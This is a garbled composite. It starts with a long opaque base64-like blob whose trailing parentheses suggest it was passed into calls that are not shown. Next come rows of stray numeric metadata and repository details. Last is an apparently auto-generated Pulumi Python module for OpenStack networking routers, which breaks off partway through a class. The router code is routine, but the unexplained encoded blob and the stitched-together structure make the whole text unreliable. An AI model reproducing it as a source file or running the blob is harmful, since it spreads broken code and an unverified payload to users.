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"))))
| 3,088.5
| 6,150
| 0.963575
| 206
| 6,177
| 28.893204
| 0.980583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164211
| 0.000324
| 6,177
| 2
| 6,150
| 3,088.5
| 0.799676
| 0
| 0
| 0
| 0
| 0.5
| 0.98608
| 0.98608
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
bcb009a8628d67b547e9074ff8d89fcfcd3aa016
| 54,401
|
py
|
Python
|
sdk/python/pulumi_openstack/networking/router.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2018-09-12T12:37:51.000Z
|
2022-02-04T19:32:13.000Z
|
sdk/python/pulumi_openstack/networking/router.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 72
|
2018-08-15T13:04:57.000Z
|
2022-03-31T15:39:49.000Z
|
sdk/python/pulumi_openstack/networking/router.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-03-14T08:28:49.000Z
|
2021-12-29T04:23:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RouterArgs', 'Router']
@pulumi.input_type
class RouterArgs:
def __init__(__self__, *,
admin_state_up: Optional[pulumi.Input[bool]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input['RouterVendorOptionsArgs']] = None):
"""
The set of arguments for constructing a Router resource.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make
network resources highly available. Resources that need high availability
are scheduled on different availability zones. Changing this
creates a new router.
:param pulumi.Input[str] description: Human-readable description for the router.
:param pulumi.Input[bool] distributed: Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
:param pulumi.Input[bool] enable_snat: Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
:param pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]] external_fixed_ips: An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
:param pulumi.Input[str] external_gateway: The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
:param pulumi.Input[str] external_network_id: The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_subnet_ids: A list of external subnet IDs to try,
one by one, to obtain a fixed IP for the router. If a subnet ID in the list has
an exhausted floating IP pool, the next subnet ID is tried. This argument is
used only during router creation and allows setting only one external fixed
IP. Conflicts with the `external_fixed_ip` argument.
:param pulumi.Input[str] name: A unique name for the router. Changing this
updates the `name` of an existing router.
:param pulumi.Input[str] region: The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the router.
:param pulumi.Input[str] tenant_id: The owner of the router. Required if an admin wants
to create a router for another tenant. Changing this creates a new router.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional driver-specific options.
:param pulumi.Input['RouterVendorOptionsArgs'] vendor_options: Map of additional vendor-specific options.
Supported options are described below.
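As a minimal, hedged sketch of using this args object directly (the network
UUID is a placeholder, and `openstack.networking.RouterArgs` is assumed to be
re-exported by the networking module):
```python
import pulumi_openstack as openstack
# Build the argument object once, then pass it to the resource constructor.
args = openstack.networking.RouterArgs(
    admin_state_up=True,
    external_network_id="f67f0d72-0ddf-11e4-9d95-e1f29f417e2f")
router1 = openstack.networking.Router("router1", args)
```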
"""
if admin_state_up is not None:
pulumi.set(__self__, "admin_state_up", admin_state_up)
if availability_zone_hints is not None:
pulumi.set(__self__, "availability_zone_hints", availability_zone_hints)
if description is not None:
pulumi.set(__self__, "description", description)
if distributed is not None:
pulumi.set(__self__, "distributed", distributed)
if enable_snat is not None:
pulumi.set(__self__, "enable_snat", enable_snat)
if external_fixed_ips is not None:
pulumi.set(__self__, "external_fixed_ips", external_fixed_ips)
if external_gateway is not None:
warnings.warn("""use external_network_id instead""", DeprecationWarning)
pulumi.log.warn("""external_gateway is deprecated: use external_network_id instead""")
if external_gateway is not None:
pulumi.set(__self__, "external_gateway", external_gateway)
if external_network_id is not None:
pulumi.set(__self__, "external_network_id", external_network_id)
if external_subnet_ids is not None:
pulumi.set(__self__, "external_subnet_ids", external_subnet_ids)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if value_specs is not None:
pulumi.set(__self__, "value_specs", value_specs)
if vendor_options is not None:
pulumi.set(__self__, "vendor_options", vendor_options)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> Optional[pulumi.Input[bool]]:
"""
Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
"""
return pulumi.get(self, "admin_state_up")
@admin_state_up.setter
def admin_state_up(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "admin_state_up", value)
@property
@pulumi.getter(name="availabilityZoneHints")
def availability_zone_hints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An availability zone is used to make
network resources highly available. Resources that need high availability
are scheduled on different availability zones. Changing this
creates a new router.
"""
return pulumi.get(self, "availability_zone_hints")
@availability_zone_hints.setter
def availability_zone_hints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zone_hints", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Human-readable description for the router.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def distributed(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
"""
return pulumi.get(self, "distributed")
@distributed.setter
def distributed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "distributed", value)
@property
@pulumi.getter(name="enableSnat")
def enable_snat(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
"""
return pulumi.get(self, "enable_snat")
@enable_snat.setter
def enable_snat(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_snat", value)
@property
@pulumi.getter(name="externalFixedIps")
def external_fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]]:
"""
An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
"""
return pulumi.get(self, "external_fixed_ips")
@external_fixed_ips.setter
def external_fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]]):
pulumi.set(self, "external_fixed_ips", value)
@property
@pulumi.getter(name="externalGateway")
def external_gateway(self) -> Optional[pulumi.Input[str]]:
"""
The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
"""
return pulumi.get(self, "external_gateway")
@external_gateway.setter
def external_gateway(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_gateway", value)
@property
@pulumi.getter(name="externalNetworkId")
def external_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
"""
return pulumi.get(self, "external_network_id")
@external_network_id.setter
def external_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_network_id", value)
@property
@pulumi.getter(name="externalSubnetIds")
def external_subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of external subnet IDs to try,
one by one, to obtain a fixed IP for the router. If a subnet ID in the list has
an exhausted floating IP pool, the next subnet ID is tried. This argument is
used only during router creation and allows setting only one external fixed
IP. Conflicts with the `external_fixed_ip` argument.
"""
return pulumi.get(self, "external_subnet_ids")
@external_subnet_ids.setter
def external_subnet_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "external_subnet_ids", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name for the router. Changing this
updates the `name` of an existing router.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of string tags for the router.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The owner of the router. Required if an admin wants
to create a router for another tenant. Changing this creates a new router.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter(name="valueSpecs")
def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Map of additional driver-specific options.
"""
return pulumi.get(self, "value_specs")
@value_specs.setter
def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "value_specs", value)
@property
@pulumi.getter(name="vendorOptions")
def vendor_options(self) -> Optional[pulumi.Input['RouterVendorOptionsArgs']]:
"""
Map of additional vendor-specific options.
Supported options are described below.
"""
return pulumi.get(self, "vendor_options")
@vendor_options.setter
def vendor_options(self, value: Optional[pulumi.Input['RouterVendorOptionsArgs']]):
pulumi.set(self, "vendor_options", value)
@pulumi.input_type
class _RouterState:
def __init__(__self__, *,
admin_state_up: Optional[pulumi.Input[bool]] = None,
all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input['RouterVendorOptionsArgs']] = None):
"""
Input properties used for looking up and filtering Router resources.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the router, which have been
explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make
network resources highly available. Resources that need high availability
are scheduled on different availability zones. Changing this
creates a new router.
:param pulumi.Input[str] description: Human-readable description for the router.
:param pulumi.Input[bool] distributed: Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
:param pulumi.Input[bool] enable_snat: Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
:param pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]] external_fixed_ips: An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
:param pulumi.Input[str] external_gateway: The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
:param pulumi.Input[str] external_network_id: The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_subnet_ids: A list of external subnet IDs to try,
one by one, to obtain a fixed IP for the router. If a subnet ID in the list has
an exhausted floating IP pool, the next subnet ID is tried. This argument is
used only during router creation and allows setting only one external fixed
IP. Conflicts with the `external_fixed_ip` argument.
:param pulumi.Input[str] name: A unique name for the router. Changing this
updates the `name` of an existing router.
:param pulumi.Input[str] region: The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the router.
:param pulumi.Input[str] tenant_id: The owner of the router. Required if an admin wants
to create a router for another tenant. Changing this creates a new router.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional driver-specific options.
:param pulumi.Input['RouterVendorOptionsArgs'] vendor_options: Map of additional vendor-specific options.
Supported options are described below.
"""
if admin_state_up is not None:
pulumi.set(__self__, "admin_state_up", admin_state_up)
if all_tags is not None:
pulumi.set(__self__, "all_tags", all_tags)
if availability_zone_hints is not None:
pulumi.set(__self__, "availability_zone_hints", availability_zone_hints)
if description is not None:
pulumi.set(__self__, "description", description)
if distributed is not None:
pulumi.set(__self__, "distributed", distributed)
if enable_snat is not None:
pulumi.set(__self__, "enable_snat", enable_snat)
if external_fixed_ips is not None:
pulumi.set(__self__, "external_fixed_ips", external_fixed_ips)
if external_gateway is not None:
warnings.warn("""use external_network_id instead""", DeprecationWarning)
pulumi.log.warn("""external_gateway is deprecated: use external_network_id instead""")
if external_gateway is not None:
pulumi.set(__self__, "external_gateway", external_gateway)
if external_network_id is not None:
pulumi.set(__self__, "external_network_id", external_network_id)
if external_subnet_ids is not None:
pulumi.set(__self__, "external_subnet_ids", external_subnet_ids)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if value_specs is not None:
pulumi.set(__self__, "value_specs", value_specs)
if vendor_options is not None:
pulumi.set(__self__, "vendor_options", vendor_options)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> Optional[pulumi.Input[bool]]:
"""
Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
"""
return pulumi.get(self, "admin_state_up")
@admin_state_up.setter
def admin_state_up(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "admin_state_up", value)
@property
@pulumi.getter(name="allTags")
def all_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The collection of tags assigned on the router, which have been
explicitly and implicitly added.
"""
return pulumi.get(self, "all_tags")
@all_tags.setter
def all_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "all_tags", value)
@property
@pulumi.getter(name="availabilityZoneHints")
def availability_zone_hints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An availability zone is used to make
network resources highly available. Resources that need high availability
are scheduled on different availability zones. Changing this
creates a new router.
"""
return pulumi.get(self, "availability_zone_hints")
@availability_zone_hints.setter
def availability_zone_hints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zone_hints", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Human-readable description for the router.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def distributed(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
"""
return pulumi.get(self, "distributed")
@distributed.setter
def distributed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "distributed", value)
@property
@pulumi.getter(name="enableSnat")
def enable_snat(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
"""
return pulumi.get(self, "enable_snat")
@enable_snat.setter
def enable_snat(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_snat", value)
@property
@pulumi.getter(name="externalFixedIps")
def external_fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]]:
"""
An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
"""
return pulumi.get(self, "external_fixed_ips")
@external_fixed_ips.setter
def external_fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]]):
pulumi.set(self, "external_fixed_ips", value)
@property
@pulumi.getter(name="externalGateway")
def external_gateway(self) -> Optional[pulumi.Input[str]]:
"""
The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
"""
return pulumi.get(self, "external_gateway")
@external_gateway.setter
